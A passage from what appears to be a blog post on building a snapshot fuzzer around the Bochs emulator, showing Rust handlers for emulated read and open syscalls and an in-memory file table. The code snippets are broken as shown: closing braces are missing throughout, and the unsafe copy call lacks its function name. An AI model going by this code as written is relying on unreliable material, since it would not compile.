                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;

            // Adjust read size if necessary
            let length = std::cmp::min(a3, file.contents.len() - file.cursor);

            // Copy the contents over to the buffer
            unsafe { 
                    file.contents.as_ptr().add(file.cursor),    // src
                    buf_p,                                      // dst
                    length);                                    // len

            // Adjust the file cursor
            file.cursor += length;

            // Success
            length as u64

open calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:

// open
        0x2 => {
            // Get pointer to path string we're trying to open
            let path_p = a1 as *const libc::c_char;

            // Make sure it's not NULL
            if path_p.is_null() {
                fault!(contextp, Fault::NullPath);

            // Create c_str from pointer
            let c_str = unsafe { std::ffi::CStr::from_ptr(path_p) };

            // Create Rust str from c_str
            let Ok(path_str) = c_str.to_str() else {
                fault!(contextp, Fault::InvalidPathStr);

            // Validate permissions
            if a2 as i32 != 32768 {
                println!("Unhandled file permissions: {}", a2);
                fault!(contextp, Fault::Syscall);

            // Open the file
            let fd = context.files.open(path_str);
            if fd.is_err() {
                println!("Non-existent file path: {}", path_str);
                fault!(contextp, Fault::NoFile);

            // Success
            fd.unwrap() as u64
// Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);

        // We didn't find the file

And that’s really the whole of file I/O right now. Down the line, we’ll need to keep these in mind when we’re doing snapshots and resetting snapshots because the file state will need to be restored differentially, but this is a problem for another day.


The work continues on the fuzzer, I’m still having a blast implementing it, special thanks to everyone mentioned in the repository for their help! Next, we’ll have to pick a fuzzing target and it get it running in Bochs. We’ll have to lobotomize the system Bochs is emulating so that it runs our target program such that we can snapshot and fuzz appropriately, that should be really fun, until then!
